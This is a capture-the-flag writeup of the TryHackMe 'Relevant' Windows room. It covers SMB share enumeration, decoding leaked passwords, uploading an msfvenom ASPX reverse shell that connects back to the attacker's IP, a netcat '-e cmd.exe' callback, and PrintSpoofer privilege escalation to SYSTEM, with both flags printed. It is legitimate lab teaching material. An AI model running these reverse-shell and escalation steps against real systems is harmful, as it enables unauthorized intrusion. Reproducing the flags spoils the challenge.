---
title: "TryHackMe - Relevant Writeup"
summary: "Writeup of Relevant room on TryHackMe"
categories: ["writeup"]
tags: ["tryhackme", "smb", "web", "windows"]
showSummary: true
date: 2022-12-04
draft: false
---

## Introduction
You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days. 

**Scope of Work**
The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).  The client has asked that you secure two flags (no location provided) as proof of exploitation:

- User.txt
- Root.txt

Additionally, the client has provided the following scope allowances:

- Any tools or techniques are permitted in this engagement, however we ask that you attempt manual exploitation first
- Locate and note all vulnerabilities found
- Submit the flags discovered to the dashboard
- Only the IP address assigned to your machine is in scope
- Find and report ALL vulnerabilities (yes, there is more than one path to root)

(Roleplay off)
I encourage you to approach this challenge as an actual penetration test. Consider writing a report, to include an executive summary, vulnerability and exploitation assessment, and remediation suggestions, as this will benefit you in preparation for the eLearnSecurity Certified Professional Penetration Tester or career as a penetration tester in the field.

Note - Nothing in this room requires Metasploit

## Recon
Firstly, we run nmap:
```bash
nmap -sV -p- 10.10.57.147 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-17 11:17 CET
Nmap scan report for 10.10.57.147
Host is up (0.056s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
49663/tcp open  http          Microsoft IIS httpd 10.0
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 162.71 seconds
```

We can see that there is a `smb` running on the host.

## Enumerate shares
As you can see, there is a share named `nt4wrksv`. Let's see if there is something interesting:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ smbclient -L 10.10.57.147 
Password for [WORKGROUP\parallels]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.57.147 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ smbclient //10.10.57.147/nt4wrksv              

Password for [WORKGROUP\parallels]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 25 23:46:04 2020
  ..                                  D        0  Sat Jul 25 23:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 17:15:33 2020

                7735807 blocks of size 4096. 5135304 blocks available
smb: \> get passwords.txt 
getting file \passwords.txt of size 98 as passwords.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> cat passwords.txt 
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
```

We have two `base64` encoded passwords:
```bash
echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
Bob - !P@$$W0rD!123                                                                
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
Bill - Juw4nnaM4n420696969!$$$
```

We can attempt to log in with the credentials but Bob's password seems to be bad, and Bill is not a valid username:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ impacket-psexec bob@10.10.57.147 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.57.147.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[*] Found writable share nt4wrksv
[*] Uploading file nXISUtpo.exe
[*] Opening SVCManager on 10.10.57.147.....
[-] Error opening SVCManager on 10.10.57.147.....
[-] Error performing the installation, cleaning up: Unable to open SVCManager
                                                                     
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ impacket-psexec bill@10.10.57.147
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] Authenticated as Guest. Aborting
```

## Enumerate website's directories
Lets try to navigate to the two websites identified by `nmap` previously:
![9728a2ed0d4711d2b1f10c7b149faeeb.png](img/9728a2ed0d4711d2b1f10c7b149faeeb.png)

The two wesbites are the same, an `ISS Welcome page`. We'll try to enumerate potentials subdirectories:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ gobuster dir --url http://10.10.215.54:49663 -b 404,400,500,503 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.215.54:49663
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,400,500,503
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/17 12:45:06 Starting gobuster in directory enumeration mode
===============================================================
/nt4wrksv             (Status: 301) [Size: 158] [--> http://10.10.215.54:49663/nt4wrksv/]
Progress: 220559 / 220561 (100.00%)===============================================================
2022/11/17 13:10:39 Finished
===============================================================
```
 
As there is a directory name as the `smb` share, maybe we can acces the file contained on the share ?

![cead5d2ed6e1ea27bc3a73ba20155a12.png](img/cead5d2ed6e1ea27bc3a73ba20155a12.png)

## Exploitation
Indeed, we can acces it. So lets try to upload a reverse shell. Commonly, on a IIS webserver, the programming language used is `ASP.NET`. And because the OS is Windows Server 2016, we should specify a `x64` architecture.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.5.152 LPORT=1234 -f aspx > reverse.aspx 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3402 bytes
```

Lets put the reverse-shell on the share:
```bash
smbclient //10.10.215.54/nt4wrksv                                                            
Password for [WORKGROUP\parallels]:
Try "help" to get a list of possible commands.
smb: \> put reverse
reverse does not exist
smb: \> put reverse.aspx 
putting file reverse.aspx as \reverse.aspx (3.3 kb/s) (average 3.3 kb/s)
```

Now, we can start a listener adn trigger the reverse-shell with `curl http://10.10.215.54:49663/nt4wrksv/reverse.aspx`:
```bash
nc -lvp 1234        
listening on [any] 1234 ...
10.10.215.54: inverse host lookup failed: Unknown host
connect to [10.11.5.152] from (UNKNOWN) [10.10.215.54] 49751
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>
```

By going on the Desktop of Bob's user, we foun the first flag:
```bash
c:\Users\Bob\Desktop>more user.txt
more user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}
```

## Privilege escalation
Now, we can see the `SeImpersonatePrivilege` enabled:
```bash
c:\Users\Bob\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

By going on [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#seimpersonateprivilege-3.1.1) we found multiples ways to exploit this vulnerability, but recent changes on the OS (Windows 10, Server 2016/2019) invites us to use a relatively new tool: [PrintSpoofer](https://github.com/itm4n/PrintSpoofer).

We just have to download the tools, upload them through `smb` and run them at the path where there are located (`c:\inetpub\wwwroot\nt4wrksv`).

Indeed, we try to use `RogueWinRM` but the WinRM service was already running:
```powershell
c:\inetpub\wwwroot\nt4wrksv>RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.11.5.152 4442"
RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.11.5.152 4442"

Listening for connection on port 5985 .... 
Error: WinRM already running on port 5985. Unexploitable!
bind failed with error: 10013
```

So, we used PrintSpoofer:
```powershell
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c powershell
PrintSpoofer64.exe -i -c powershell
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> cd c:\users\Administrator
cd c:\users\Administrator
PS C:\users\Administrator> dir
dir


    Directory: C:\users\Administrator


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-r---        7/25/2020   7:58 AM                Contacts                      
d-r---        7/25/2020   8:24 AM                Desktop                       
d-r---        7/25/2020   7:58 AM                Documents                     
d-r---        7/25/2020   8:39 AM                Downloads                     
d-r---        7/25/2020   7:58 AM                Favorites                     
d-r---        7/25/2020   7:58 AM                Links                         
d-r---        7/25/2020   7:58 AM                Music                         
d-r---        7/25/2020   7:58 AM                Pictures                      
d-r---        7/25/2020   7:58 AM                Saved Games                   
d-r---        7/25/2020   7:58 AM                Searches                      
d-r---        7/25/2020   7:58 AM                Videos                        


PS C:\users\Administrator> dir Desktop
dir Desktop


    Directory: C:\users\Administrator\Desktop


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----        7/25/2020   8:25 AM             35 root.txt                      


PS C:\users\Administrator> more Desktop\root.txt
more Desktop\root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
```

The full explanation of the tool is [here](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/).